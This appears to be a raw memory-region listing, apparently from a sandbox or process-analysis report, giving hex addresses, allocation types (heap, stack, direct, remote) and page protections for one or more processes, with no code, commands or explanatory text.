22FE3080000
heap
page read and write
791000
heap
page read and write
7FFD9B9AD000
trusted library allocation
page execute and read and write
930000
heap
page read and write
2657A000
direct allocation
page read and write
946000
heap
page read and write
938000
heap
page read and write
27087FD0000
heap
page read and write
7FF70CC70000
unkown
page readonly
63F000
stack
page read and write
27518000
heap
page read and write
7FF70CCCC000
unkown
page write copy
5ED000
heap
page read and write
F6555FF000
stack
page read and write
7FF70CCA2000
unkown
page readonly
3FA50000
heap
page read and write
19B4EB3000
stack
page read and write
584000
heap
page read and write
7FF70CCC9000
unkown
page readonly
3FC80000
heap
page read and write
141713AB000
heap
page read and write
3DB70000
heap
page read and write
930000
heap
page read and write
1C7CC24B000
heap
page read and write
141713AB000
heap
page read and write
3BFFE000
stack
page read and write
7FF70CCBF000
unkown
page read and write
459000
system
page execute and read and write
7FFD9BBF0000
trusted library allocation
page read and write
1F43AF1A000
trusted library allocation
page read and write
7F4F0000
direct allocation
page read and write
27571000
heap
page read and write
9C9000
heap
page read and write
27502000
heap
page read and write
26573000
direct allocation
page read and write
2743000
heap
page read and write
584000
heap
page read and write
7FF70CCC9000
unkown
page readonly
2749000
heap
page read and write
3FAB1000
heap
page read and write
7FF70CCA2000
unkown
page readonly
141713AB000
heap
page read and write
2C475EC0000
heap
page read and write
7FF70CC70000
unkown
page readonly
1F43AFAA000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
7FFD9BA60000
trusted library allocation
page execute and read and write
7FF70CC70000
unkown
page readonly
1BD75380000
heap
page read and write
21C51520000
heap
page read and write
924000
heap
page read and write
B23894E000
stack
page read and write
268EF000
stack
page read and write
3FA6E000
heap
page read and write
19B4FFE000
stack
page read and write
274F4000
heap
page read and write
275E9000
heap
page read and write
270880C0000
heap
page read and write
9B000
stack
page read and write
3FA82000
heap
page read and write
1F453190000
heap
page execute and read and write
27571000
heap
page read and write
217FD5D8000
heap
page read and write
624000
heap
page read and write
92C000
heap
page read and write
93A000
heap
page read and write
27502000
heap
page read and write
1BD75640000
heap
page read and write
3DC80000
heap
page read and write
93A000
heap
page read and write
3DBBE000
stack
page read and write
7FF70CCBF000
unkown
page read and write
26618000
direct allocation
page read and write
14171580000
heap
page read and write
279A7000
direct allocation
page execute and read and write
27571000
heap
page read and write
624000
heap
page read and write
1DFC9688000
heap
page read and write
7FF70CCCC000
unkown
page write copy
22FE2EB0000
heap
page read and write
4701FFF000
stack
page read and write
19D000
stack
page read and write
7FF70CCAD000
unkown
page write copy
2990D83B000
heap
page read and write
7FFD9BC50000
trusted library allocation
page read and write
27570000
heap
page read and write
7FF70CCA2000
unkown
page readonly
9C000
stack
page read and write
401000
unkown
page execute read
27518000
heap
page read and write
1F0000
heap
page read and write
9D5000
heap
page read and write
5FE000
stack
page read and write
7FF70CC71000
unkown
page execute read
772000
heap
page read and write
1C7CC610000
heap
page read and write
1E892360000
heap
page read and write
710000
heap
page read and write
966000
heap
page read and write
997000
heap
page read and write
3C01E000
heap
page read and write
166CFD20000
heap
page read and write
7FF70CC71000
unkown
page execute read
1FEF1370000
heap
page read and write
7FF70CC70000
unkown
page readonly
76948FF000
stack
page read and write
27518000
heap
page read and write
265E8000
direct allocation
page read and write
584000
heap
page read and write
7FF70CC70000
unkown
page readonly
6C0000
heap
page read and write
E50593D000
stack
page read and write
24E03B80000
heap
page read and write
14172DC0000
heap
page read and write
9C000
stack
page read and write
19B55F6000
stack
page read and write
28BE7300000
heap
page read and write
141713AB000
heap
page read and write
276B0000
heap
page read and write
7F2D0000
direct allocation
page read and write
9CC000
heap
page read and write
921000
heap
page read and write
7F330000
direct allocation
page read and write
3FA51000
heap
page read and write
5ED000
heap
page read and write
74B9FF000
stack
page read and write
14155138000
heap
page read and write
27571000
heap
page read and write
26E01305000
heap
page read and write
2747000
heap
page read and write
1F4390E0000
heap
page read and write
3C300000
heap
page read and write
2799000
heap
page read and write
1AC39BB0000
heap
page read and write
921000
heap
page read and write
1F43A9B0000
heap
page readonly
237D000
direct allocation
page read and write
7EDE0000
direct allocation
page read and write
7FF70CCA2000
unkown
page readonly
91E000
heap
page read and write
7EC30000
direct allocation
page read and write
7FF6996C1000
unkown
page execute read
7FF70CCAD000
unkown
page read and write
7FF70CC70000
unkown
page readonly
706000
heap
page read and write
19B58FF000
stack
page read and write
93B000
heap
page read and write
B882DFF000
stack
page read and write
7EF2F000
direct allocation
page read and write
5C0000
heap
page read and write
7FF70CCCC000
unkown
page write copy
908E37E000
stack
page read and write
935000
heap
page read and write
273FE000
heap
page read and write
20AF000
stack
page read and write
7FF70CCBF000
unkown
page read and write
3FBF5000
heap
page read and write
3BE50000
heap
page read and write
7FF70CCC9000
unkown
page readonly
1C7CC470000
heap
page read and write
1FEF13AC000
heap
page read and write
7FF70CC70000
unkown
page readonly
33220FE000
stack
page read and write
7FF70CC70000
unkown
page readonly
2990D873000
heap
page read and write
94A000
heap
page read and write
274F1000
heap
page read and write
22FE2ED8000
heap
page read and write
26CDE000
stack
page read and write
21C513E3000
heap
page read and write
3BFBF000
stack
page read and write
26EAE000
stack
page read and write
22A45780000
heap
page read and write
26E1F000
stack
page read and write
263F000
stack
page read and write
19B577E000
stack
page read and write
1F439149000
heap
page read and write
7EF2F000
direct allocation
page read and write
7EF2F000
direct allocation
page read and write
938000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
1FEF0F60000
heap
page read and write
24E4000
direct allocation
page read and write
4C9000
unkown
page read and write
217FEE30000
heap
page read and write
2990DA0D000
heap
page read and write
24AE000
direct allocation
page read and write
7FC80000
direct allocation
page read and write
14155415000
heap
page read and write
26FAF000
stack
page read and write
957000
heap
page read and write
3FA6E000
heap
page read and write
7EDE0000
direct allocation
page read and write
460000
unkown
page write copy
2756D000
heap
page read and write
22FE30D0000
heap
page read and write
2741000
heap
page read and write
7FF7E0A43000
unkown
page read and write
238A000
direct allocation
page read and write
7FF6996C0000
unkown
page readonly
2990F6E0000
trusted library allocation
page read and write
B238C7E000
stack
page read and write
7FF70CCC9000
unkown
page readonly
7FD5F000
direct allocation
page read and write
A5E000
heap
page read and write
930000
heap
page read and write
1F453010000
heap
page read and write
624000
heap
page read and write
7EDE0000
direct allocation
page read and write
14171376000
heap
page read and write
26E00FC0000
heap
page read and write
584000
heap
page read and write
226F000
stack
page read and write
9B5000
heap
page read and write
2741000
heap
page read and write
6A0000
heap
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
53E000
stack
page read and write
930000
heap
page read and write
27570000
heap
page read and write
941000
heap
page read and write
935000
heap
page read and write
1417137A000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
141713AD000
heap
page read and write
600000
heap
page read and write
74A000
heap
page read and write
1F43A980000
trusted library allocation
page read and write
28DC000
direct allocation
page execute and read and write
617ABFF000
stack
page read and write
24E03B60000
heap
page read and write
14155410000
heap
page read and write
2990D85B000
heap
page read and write
710000
heap
page read and write
610000
heap
page read and write
1F44AF74000
trusted library allocation
page read and write
7F480000
direct allocation
page read and write
7FF7E0A40000
unkown
page readonly
2740000
heap
page read and write
7FF70CCCC000
unkown
page write copy
27570000
heap
page read and write
A3F000
stack
page read and write
70B000
heap
page read and write
45C000
unkown
page read and write
1F43AAA0000
heap
page read and write
1FEF1060000
heap
page read and write
931000
heap
page read and write
7FF70CCA2000
unkown
page readonly
2990D873000
heap
page read and write
418000
unkown
page execute and read and write
3FADD000
heap
page read and write
265E6000
direct allocation
page read and write
2645000
heap
page read and write
3FA5C000
heap
page read and write
956000
heap
page read and write
ED4C1FF000
stack
page read and write
4B0000
heap
page read and write
584000
heap
page read and write
234E000
direct allocation
page read and write
2990DA05000
heap
page read and write
665000
heap
page read and write
19B4FBE000
stack
page read and write
908E67F000
stack
page read and write
938000
heap
page read and write
1FEF10DA000
heap
page read and write
98B000
heap
page read and write
7EEB0000
direct allocation
page read and write
19525FE000
stack
page read and write
7FF70CCCC000
unkown
page write copy
7FFD9BB90000
trusted library allocation
page execute and read and write
2C23B410000
heap
page read and write
274F8000
heap
page read and write
2756F000
heap
page read and write
2640000
heap
page read and write
921000
heap
page read and write
7ECB0000
direct allocation
page read and write
2508000
direct allocation
page read and write
7FF70CCC9000
unkown
page readonly
3FBBC000
heap
page read and write
27960000
direct allocation
page execute and read and write
935000
heap
page read and write
7DF4A12D0000
trusted library allocation
page execute and read and write
7FF70CCCC000
unkown
page write copy
274F1000
heap
page read and write
27516000
heap
page read and write
27457000
heap
page read and write
2990D85B000
heap
page read and write
7F5F7000
direct allocation
page read and write
28BE7465000
heap
page read and write
2749000
heap
page read and write
740000
heap
page read and write
7FF70CC70000
unkown
page readonly
740000
heap
page read and write
2520000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
54E000
stack
page read and write
748000
heap
page read and write
275F8000
heap
page read and write
26B9F000
stack
page read and write
3FB43000
heap
page read and write
921000
heap
page read and write
5E0000
heap
page read and write
27570000
heap
page read and write
7FF70CCAD000
unkown
page write copy
26E98000
direct allocation
page execute and read and write
7FF70CCC9000
unkown
page readonly
2990D82A000
heap
page read and write
624000
heap
page read and write
8AA000
heap
page read and write
584000
heap
page read and write
1F4530E6000
heap
page read and write
7EE70000
direct allocation
page read and write
3C280000
heap
page read and write
7FF70CC71000
unkown
page execute read
473000
system
page execute and read and write
5F0000
heap
page read and write
3C042000
heap
page read and write
2384000
direct allocation
page read and write
7FF70CC70000
unkown
page readonly
4A3000
remote allocation
page execute and read and write
7FF70CC70000
unkown
page readonly
22FE30E0000
heap
page read and write
27088200000
heap
page read and write
3FAC9000
heap
page read and write
19B527E000
stack
page read and write
7FD70000
direct allocation
page read and write
166CFEC0000
heap
page read and write
266EA000
stack
page read and write
936000
heap
page read and write
7FF70CCB1000
unkown
page read and write
141715A5000
heap
page read and write
1DFC96A3000
heap
page read and write
7FF70CCA2000
unkown
page readonly
7FF6FEF9B000
unkown
page readonly
93F000
stack
page read and write
27570000
heap
page read and write
27571000
heap
page read and write
1F4390B5000
heap
page read and write
24E03C10000
heap
page read and write
265C4000
direct allocation
page read and write
2990D858000
heap
page read and write
7FF70CC71000
unkown
page execute read
946000
heap
page read and write
217FD5B6000
heap
page read and write
928000
heap
page read and write
1F4391B1000
heap
page read and write
3DB5E000
stack
page read and write
9A9000
heap
page read and write
259A000
direct allocation
page read and write
3FCB1000
heap
page read and write
584000
heap
page read and write
2754C000
heap
page read and write
94B000
heap
page read and write
7FF70CCC9000
unkown
page readonly
2796F000
direct allocation
page execute and read and write
7FF70CCC9000
unkown
page readonly
1415514A000
heap
page read and write
4C7000
unkown
page execute and read and write
1F4531C0000
heap
page read and write
74BAFF000
stack
page read and write
7FFD9B9A3000
trusted library allocation
page execute and read and write
1F43AF01000
trusted library allocation
page read and write
7FF70CCCD000
unkown
page readonly
7FF70CCB1000
unkown
page read and write
2633000
direct allocation
page read and write
1BD753CB000
heap
page read and write
7FF70CCAD000
unkown
page write copy
26A5F000
stack
page read and write
1FEF2AC0000
heap
page read and write
217FD4FC000
heap
page read and write
4B9000
remote allocation
page execute and read and write
7FF70CCA2000
unkown
page readonly
27570000
heap
page read and write
7FFD9BB82000
trusted library allocation
page read and write
7FF6996D6000
unkown
page read and write
7FF70CCBF000
unkown
page read and write
1F43B428000
trusted library allocation
page read and write
1E892283000
heap
page read and write
9B4000
heap
page read and write
26E60000
remote allocation
page read and write
4701EFF000
stack
page read and write
1C7CC450000
heap
page read and write
900000
heap
page read and write
3F7BF000
stack
page read and write
584000
heap
page read and write
58E000
stack
page read and write
929000
heap
page read and write
1F0000
heap
page read and write
3E58E000
stack
page read and write
27570000
heap
page read and write
7FF70CCBF000
unkown
page read and write
2360000
direct allocation
page read and write
7FF70CCC9000
unkown
page readonly
1F43B016000
trusted library allocation
page read and write
7FF70CCA2000
unkown
page readonly
400000
system
page execute and read and write
3FA51000
heap
page read and write
7FF6FEF90000
unkown
page readonly
7FFD9BC20000
trusted library allocation
page read and write
6E0000
heap
page read and write
45D000
system
page execute and read and write
4C0000
remote allocation
page execute and read and write
7FF70CC71000
unkown
page execute read
7FF70CC71000
unkown
page execute read
540000
heap
page read and write
7FF70CC71000
unkown
page execute read
ED4C2FF000
stack
page read and write
1F43AAA5000
heap
page read and write
7FF70CCAD000
unkown
page write copy
7F450000
direct allocation
page read and write
93B000
heap
page read and write
28BE7400000
heap
page read and write
7FF70CC71000
unkown
page execute read
4B1000
unkown
page execute and read and write
947000
heap
page read and write
7FF70CCAD000
unkown
page write copy
217FD5CE000
heap
page read and write
624000
heap
page read and write
270880CA000
heap
page read and write
7FF70CC71000
unkown
page execute read
7FFD9BB70000
trusted library allocation
page execute and read and write
7FF70CCBF000
unkown
page read and write
2717A000
heap
page read and write
458000
unkown
page execute read
24CE000
stack
page read and write
7EE58000
direct allocation
page read and write
2748000
heap
page read and write
268E000
stack
page read and write
98A000
heap
page read and write
274FE000
heap
page read and write
141713A8000
heap
page read and write
45C000
system
page execute and read and write
1F453039000
heap
page read and write
7FF70CCC9000
unkown
page readonly
930000
heap
page read and write
2C475CB0000
heap
page read and write
141715A0000
heap
page read and write
1FEF10E7000
heap
page read and write
26611000
direct allocation
page read and write
7EE5F000
direct allocation
page read and write
1F43B2E6000
trusted library allocation
page read and write
7FF70CC71000
unkown
page execute read
7FF70CC71000
unkown
page execute read
27570000
heap
page read and write
693000
heap
page read and write
2756F000
heap
page read and write
7FF70CCCC000
unkown
page write copy
34C8FD000
stack
page read and write
930000
heap
page read and write
14171368000
heap
page read and write
3E40F000
stack
page read and write
3E80C000
stack
page read and write
2756F000
heap
page read and write
670000
heap
page read and write
7F4AF000
direct allocation
page read and write
7FF70CCC9000
unkown
page readonly
7FF7E0A30000
unkown
page readonly
7FF70CC71000
unkown
page execute read
93A000
heap
page read and write
938000
heap
page read and write
3BEBE000
stack
page read and write
F4CA17D000
stack
page read and write
921000
heap
page read and write
7FFD9BA86000
trusted library allocation
page execute and read and write
7FF70CCCC000
unkown
page write copy
1F453197000
heap
page execute and read and write
3DBC0000
heap
page read and write
19526FF000
stack
page read and write
91C000
heap
page read and write
26A9E000
stack
page read and write
7FF70CCBF000
unkown
page read and write
400000
unkown
page readonly
7FF70CCAD000
unkown
page write copy
776000
heap
page read and write
9CC000
heap
page read and write
F4CA4FF000
stack
page read and write
22A45B30000
heap
page read and write
7FDE0000
direct allocation
page read and write
938000
heap
page read and write
3FAF2000
heap
page read and write
7FF70CCCD000
unkown
page readonly
27570000
heap
page read and write
935000
heap
page read and write
27505000
heap
page read and write
97B000
heap
page read and write
24F3000
direct allocation
page read and write
24EC000
direct allocation
page read and write
3F7CC000
heap
page read and write
7FF70CC70000
unkown
page readonly
C8417FF000
stack
page read and write
279A9000
direct allocation
page execute and read and write
265B6000
direct allocation
page read and write
265ED000
direct allocation
page read and write
770000
heap
page read and write
4E4000
unkown
page execute and read and write
4C9000
unkown
page read and write
7FFD9BA56000
trusted library allocation
page read and write
7FF70CCC9000
unkown
page readonly
1C7CC240000
heap
page read and write
7FF70CC71000
unkown
page execute read
952000
heap
page read and write
617AAFB000
stack
page read and write
14172DC3000
heap
page read and write
1F0000
heap
page read and write
7FF70CC71000
unkown
page execute read
265FC000
direct allocation
page read and write
7FF70CCA2000
unkown
page readonly
2641000
heap
page read and write
3FC70000
heap
page read and write
3FAA5000
heap
page read and write
7EB70000
direct allocation
page read and write
931000
heap
page read and write
7FF6FEF9F000
unkown
page readonly
2310000
heap
page read and write
1F4530C8000
heap
page read and write
7FF6996CA000
unkown
page readonly
7FFD9BCA0000
trusted library allocation
page read and write
7FF70CCAD000
unkown
page write copy
C84137C000
stack
page read and write
217FD5A3000
heap
page read and write
584000
heap
page read and write
C56000
heap
page read and write
7FB70000
direct allocation
page read and write
1FEF10C8000
heap
page read and write
7FF70CCCD000
unkown
page readonly
9C9000
heap
page read and write
7EDE0000
direct allocation
page read and write
2741000
heap
page read and write
7FF70CCA2000
unkown
page readonly
7FF6996D7000
unkown
page readonly
624000
heap
page read and write
7FF70CC70000
unkown
page readonly
2501000
direct allocation
page read and write
2C475EA0000
heap
page read and write
F4CA5FF000
stack
page read and write
217FD5BB000
heap
page read and write
A7C000
stack
page read and write
9A9000
heap
page read and write
7FF70CCC9000
unkown
page readonly
1E89226B000
heap
page read and write
707000
heap
page read and write
3DD7FFE000
stack
page read and write
1F43B025000
trusted library allocation
page read and write
14173B00000
heap
page read and write
23BBAC40000
heap
page read and write
61E000
stack
page read and write
2624000
direct allocation
page read and write
2745000
heap
page read and write
7F390000
direct allocation
page read and write
26CDE000
stack
page read and write
AEE000
stack
page read and write
27506000
heap
page read and write
5E0000
heap
page read and write
7EA50000
direct allocation
page read and write
4B9000
unkown
page execute and read and write
7FF70CCC9000
unkown
page readonly
25A0000
heap
page read and write
265477E000
stack
page read and write
4610000
trusted library allocation
page read and write
C50000
heap
page read and write
994000
heap
page read and write
7FF70CCAD000
unkown
page write copy
2250000
heap
page read and write
7FF70CCAD000
unkown
page write copy
6AE000
stack
page read and write
7FF70CCA2000
unkown
page readonly
3FA89000
heap
page read and write
7F480000
direct allocation
page read and write
94A000
heap
page read and write
1C7CC268000
heap
page read and write
7FF70CC71000
unkown
page execute read
1C7CC263000
heap
page read and write
92E000
heap
page read and write
7FF70CCC4000
unkown
page read and write
2750C000
heap
page read and write
265D0000
direct allocation
page read and write
1FEF2AC3000
heap
page read and write
27571000
heap
page read and write
1E892480000
heap
page read and write
26D1E000
stack
page read and write
624000
heap
page read and write
1C7CC430000
heap
page read and write
1AC39CB0000
heap
page read and write
2523000
heap
page read and write
93A000
heap
page read and write
7F5D0000
direct allocation
page read and write
26E91000
direct allocation
page execute and read and write
7EEA0000
direct allocation
page read and write
94E000
heap
page read and write
26E00FA0000
heap
page read and write
7FF70CCCD000
unkown
page readonly
27502000
heap
page read and write
274FA000
heap
page read and write
624000
heap
page read and write
26E60000
remote allocation
page read and write
7F380000
direct allocation
page read and write
7FF70CCAD000
unkown
page read and write
7FF70CC70000
unkown
page readonly
7FF70CC71000
unkown
page execute read
7F598000
direct allocation
page read and write
945000
heap
page read and write
7FF70CCC4000
unkown
page read and write
1CC000
stack
page read and write
26D1E000
stack
page read and write
7FFD9B9A2000
trusted library allocation
page read and write
19B4F3E000
stack
page read and write
265BD000
direct allocation
page read and write
624000
heap
page read and write
993000
heap
page read and write
27518000
heap
page read and write
978000
heap
page read and write
7FF70CCCC000
unkown
page write copy
7F310000
direct allocation
page read and write
700000
heap
page read and write
1F44AF01000
trusted library allocation
page read and write
7FF70CCC9000
unkown
page readonly
2C23B610000
heap
page read and write
1FEF110B000
heap
page read and write
F6554FE000
stack
page read and write
91C000
heap
page read and write
19C000
stack
page read and write
3FC6E000
heap
page read and write
690000
heap
page read and write
7FF70CCA2000
unkown
page readonly
7F44F000
direct allocation
page read and write
22FE2EA0000
heap
page read and write
9C3000
heap
page read and write
7EE60000
direct allocation
page read and write
7F1F0000
direct allocation
page read and write
7FF70CCCD000
unkown
page readonly
28BE7460000
heap
page read and write
942000
heap
page read and write
1AC39C90000
heap
page read and write
1AC39FE5000
heap
page read and write
88C000
stack
page read and write
7FF70CCC9000
unkown
page readonly
6E0000
heap
page read and write
94A000
heap
page read and write
7FF70CCBF000
unkown
page read and write
1F43AF6A000
trusted library allocation
page read and write
590000
heap
page read and write
17C000
stack
page read and write
7FF6FEF9E000
unkown
page write copy
7FF70CCC9000
unkown
page readonly
34CAFF000
stack
page read and write
3E44E000
stack
page read and write
F6551ED000
stack
page read and write
7EF30000
direct allocation
page read and write
71E000
heap
page read and write
26E011E0000
heap
page read and write
27506000
heap
page read and write
7FFD9BC00000
trusted library allocation
page read and write
7FF70CCB1000
unkown
page read and write
40116000
direct allocation
page execute and read and write
7FF70CC70000
unkown
page readonly
7FF70CC71000
unkown
page execute read
217FD5DB000
heap
page read and write
279AB000
direct allocation
page execute and read and write
27941000
direct allocation
page execute and read and write
7FF70CCCD000
unkown
page readonly
10DE84F0000
heap
page read and write
24DD000
direct allocation
page read and write
93C000
heap
page read and write
7FF70CCCD000
unkown
page readonly
1DFC9665000
heap
page read and write
D0B9CFF000
stack
page read and write
98A000
heap
page read and write
222C000
stack
page read and write
98A000
heap
page read and write
99F000
heap
page read and write
939000
heap
page read and write
3FCB1000
heap
page read and write
7ECC0000
direct allocation
page read and write
1BD753E7000
heap
page read and write
2750A000
heap
page read and write
7FF70CC71000
unkown
page execute read
7FF70CCAD000
unkown
page read and write
4AA000
unkown
page execute and read and write
2990D85B000
heap
page read and write
27571000
heap
page read and write
778000
heap
page read and write
2990D823000
heap
page read and write
1DFC9680000
heap
page read and write
1DFC9640000
heap
page read and write
938000
heap
page read and write
7E870000
direct allocation
page read and write
19B597B000
stack
page read and write
217FD3F0000
heap
page read and write
1F453087000
heap
page read and write
141552F0000
heap
page read and write
3FBE3000
heap
page read and write
A8DC0FE000
stack
page read and write
2368000
direct allocation
page read and write
7FF7E0A31000
unkown
page execute read
4CB000
unkown
page write copy
7FF70CCB1000
unkown
page read and write
1F439090000
heap
page read and write
27570000
heap
page read and write
97C000
heap
page read and write
9A9000
heap
page read and write
7ED50000
direct allocation
page read and write
7FF70CCAD000
unkown
page read and write
7FF70CCAD000
unkown
page read and write
932000
heap
page read and write
7FF70CC70000
unkown
page readonly
98A000
heap
page read and write
7FF70CCAD000
unkown
page write copy
D0B9BFF000
stack
page read and write
7FF70CCA2000
unkown
page readonly
1F43B409000
trusted library allocation
page read and write
7FF70CCAD000
unkown
page read and write
217FFBA0000
heap
page read and write
4C0000
unkown
page execute and read and write
2746000
heap
page read and write
14155127000
heap
page read and write
27964000
direct allocation
page execute and read and write
7FF70CCBF000
unkown
page read and write
1DFC9870000
heap
page read and write
7FF70CC70000
unkown
page readonly
26CE000
stack
page read and write
1417137A000
heap
page read and write
2342000
direct allocation
page read and write
1F0000
heap
page read and write
23BBAAC0000
heap
page read and write
1E892485000
heap
page read and write
7FD7C000
direct allocation
page read and write
189000
stack
page read and write
7FF70CCAD000
unkown
page read and write
769487E000
stack
page read and write
985000
heap
page read and write
217FD5AA000
heap
page read and write
7FF70CCA2000
unkown
page readonly
7FFD9BC70000
trusted library allocation
page read and write
217FD5A6000
heap
page read and write
584000
heap
page read and write
7FF70CCA2000
unkown
page readonly
3FC50000
heap
page read and write
1F439060000
heap
page read and write
2772F000
stack
page read and write
14171386000
heap
page read and write
21C51530000
heap
page read and write
7FFD9BB51000
trusted library allocation
page read and write
4701B1C000
stack
page read and write
6B4000
heap
page read and write
166CFC20000
heap
page read and write
93A000
heap
page read and write
7EA10000
direct allocation
page read and write
7FF70CC70000
unkown
page readonly
45C000
unkown
page write copy
19D000
stack
page read and write
4EB000
remote allocation
page execute and read and write
1F43B42E000
trusted library allocation
page read and write
430000
heap
page read and write
26BDE000
stack
page read and write
19B547F000
stack
page read and write
3C010000
heap
page read and write
A5E000
heap
page read and write
7FF70CCAD000
unkown
page write copy
2C475EE0000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
2751E000
heap
page read and write
10DE83E0000
heap
page read and write
3C000000
heap
page read and write
7EE70000
direct allocation
page read and write
1E8921D0000
heap
page read and write
7EAE0000
direct allocation
page read and write
D70000
heap
page read and write
27657000
heap
page read and write
970000
heap
page read and write
14171360000
heap
page read and write
3DD7B9C000
stack
page read and write
2456000
direct allocation
page read and write
6F0000
direct allocation
page execute and read and write
9D5000
heap
page read and write
2641000
direct allocation
page read and write
977000
heap
page read and write
7EE70000
direct allocation
page read and write
7FF70CCAD000
unkown
page write copy
660000
heap
page read and write
26E1D000
stack
page read and write
7FF70CCA2000
unkown
page readonly
20B8000
heap
page read and write
7FFD9BB40000
trusted library allocation
page read and write
4CE000
unkown
page execute and read and write
40D000
unkown
page write copy
7FFD9BC30000
trusted library allocation
page read and write
2990DA00000
heap
page read and write
23BBA9A0000
heap
page read and write
7FF70CC70000
unkown
page readonly
23C0000
heap
page read and write
1FEF10DA000
heap
page read and write
4AE000
stack
page read and write
265A8000
direct allocation
page read and write
7FF70CCBF000
unkown
page read and write
7FF70CC70000
unkown
page readonly
7FF70CCB1000
unkown
page read and write
270881C0000
heap
page read and write
265C9000
direct allocation
page read and write
2C475DAB000
heap
page read and write
272A4000
heap
page read and write
272A4000
heap
page read and write
28AC000
direct allocation
page execute and read and write
217FD4F5000
heap
page read and write
2990D9B0000
heap
page read and write
1F4390B0000
heap
page read and write
3E6CE000
stack
page read and write
239A000
direct allocation
page read and write
7FB70000
direct allocation
page read and write
264F0000
direct allocation
page read and write
92E000
heap
page read and write
934000
heap
page read and write
7FF70CCAD000
unkown
page read and write
400000
system
page execute and read and write
27518000
heap
page read and write
631000
heap
page read and write
7F75B000
direct allocation
page read and write
2648000
direct allocation
page read and write
28BE73E0000
heap
page read and write
3DBC4000
heap
page read and write
938000
heap
page read and write
4EB000
unkown
page execute and read and write
166CFDC0000
heap
page read and write
93C000
heap
page read and write
7FF70CCC9000
unkown
page readonly
1FEF1108000
heap
page read and write
787000
heap
page read and write
908E6FE000
stack
page read and write
3FC60000
heap
page read and write
1FEF110B000
heap
page read and write
584000
heap
page read and write
7FF70CC71000
unkown
page execute read
617ACFF000
stack
page read and write
1F4530CD000
heap
page read and write
7FF70CCB1000
unkown
page read and write
936000
heap
page read and write
98E000
heap
page read and write
26BDE000
stack
page read and write
7FF70CCA2000
unkown
page readonly
2C475DC2000
heap
page read and write
7FF70CCA2000
unkown
page readonly
7FF70CC71000
unkown
page execute read
401000
unkown
page execute read
2C23B433000
heap
page read and write
7FFD9BB5A000
trusted library allocation
page read and write
7FF699729000
unkown
page readonly
1C7CC615000
heap
page read and write
7FF70CCC9000
unkown
page readonly
7E940000
direct allocation
page read and write
2990D710000
heap
page read and write
27571000
heap
page read and write
27518000
heap
page read and write
25A1000
heap
page read and write
93F000
stack
page read and write
7FF70CC70000
unkown
page readonly
7FF6FEF9B000
unkown
page readonly
10DE85F0000
heap
page read and write
2350000
direct allocation
page read and write
10DE8690000
heap
page read and write
7FF70CCCD000
unkown
page readonly
26B8F000
stack
page read and write
22FE2EB7000
heap
page read and write
19B56F9000
stack
page read and write
2660A000
direct allocation
page read and write
624000
heap
page read and write
217FD5DB000
heap
page read and write
400000
system
page execute and read and write
250E000
stack
page read and write
7FF70CCA2000
unkown
page readonly
1F43B01F000
trusted library allocation
page read and write
7FF70CC70000
unkown
page readonly
14155120000
heap
page read and write
1FEF2F10000
trusted library allocation
page read and write
7FFD9BC80000
trusted library allocation
page read and write
3E68F000
stack
page read and write
4DD000
remote allocation
page execute and read and write
21C51525000
heap
page read and write
6F0000
direct allocation
page execute and read and write
21C513C0000
heap
page read and write
624000
heap
page read and write
580000
heap
page read and write
7FF70CCBF000
unkown
page read and write
23BBA9C9000
heap
page read and write
2C23B530000
heap
page read and write
78E000
heap
page read and write
1F43B3D4000
trusted library allocation
page read and write
28BE74BB000
heap
page read and write
7ED50000
direct allocation
page read and write
7FF70CCBF000
unkown
page read and write
27570000
heap
page read and write
1F43B3AC000
trusted library allocation
page read and write
7FF70CCC9000
unkown
page readonly
3E7CF000
stack
page read and write
1BD75350000
heap
page read and write
98A000
heap
page read and write
27571000
heap
page read and write
3C20F000
stack
page read and write
44B000
unkown
page execute and read and write
936000
heap
page read and write
177000
stack
page read and write
2990D81F000
heap
page read and write
2641000
heap
page read and write
7FF7E0A30000
unkown
page readonly
2990D83B000
heap
page read and write
1BD75630000
heap
page read and write
7FF70CCB1000
unkown
page read and write
94B000
heap
page read and write
7FF70CC71000
unkown
page execute read
7FF70CCCC000
unkown
page write copy
938000
heap
page read and write
19B53FE000
stack
page read and write
19524FC000
stack
page read and write
1F43911E000
heap
page read and write
984000
heap
page read and write
4C6000
unkown
page write copy
2748000
heap
page read and write
27570000
heap
page read and write
217FD597000
heap
page read and write
1FEF1123000
heap
page read and write
3E30E000
stack
page read and write
4F0000
heap
page read and write
1F4390F2000
heap
page read and write
938000
heap
page read and write
217FD500000
heap
page read and write
1BD753E3000
heap
page read and write
2671A000
stack
page read and write
26E94000
direct allocation
page execute and read and write
2C23B510000
heap
page read and write
7FF70CCC9000
unkown
page readonly
D0B9AFD000
stack
page read and write
CD5A8FF000
stack
page read and write
7FF70CCCD000
unkown
page readonly
7FF70CCAD000
unkown
page write copy
3BE70000
heap
page read and write
7FF70CC71000
unkown
page execute read
27517000
heap
page read and write
7FF70CC70000
unkown
page readonly
7FFD9BC10000
trusted library allocation
page read and write
27518000
heap
page read and write
4CE000
remote allocation
page execute and read and write
27290000
heap
page read and write
ED4C0FD000
stack
page read and write
1FEF110B000
heap
page read and write
217FD5A6000
heap
page read and write
1F0000
heap
page read and write
34C9FE000
stack
page read and write
7FF70CCC9000
unkown
page readonly
238C000
direct allocation
page read and write
99F000
heap
page read and write
21C513CD000
heap
page read and write
4DD000
unkown
page execute and read and write
23A8000
direct allocation
page read and write
2990D818000
heap
page read and write
1F4530A5000
heap
page read and write
1F453052000
heap
page read and write
28BE75B0000
heap
page read and write
7FF6FEF9F000
unkown
page readonly
7FF70CCCC000
unkown
page write copy
26E01010000
heap
page read and write
584000
heap
page read and write
1DFC9850000
heap
page read and write
7FF70CCA2000
unkown
page readonly
18F000
stack
page read and write
270881E0000
heap
page read and write
1AC39D60000
heap
page read and write
7FF70CCCD000
unkown
page readonly
400000
unkown
page readonly
7FF70CCC9000
unkown
page readonly
2740000
trusted library allocation
page read and write
7F5EE000
direct allocation
page read and write
971000
heap
page read and write
265F4000
direct allocation
page read and write
935000
heap
page read and write
1AC39FE0000
heap
page read and write
7EE60000
direct allocation
page read and write
1C7CC350000
heap
page read and write
7FF70CC71000
unkown
page execute read
217FEE63000
heap
page read and write
7F40F000
direct allocation
page read and write
96A000
heap
page read and write
1F4391AD000
heap
page read and write
92D000
heap
page read and write
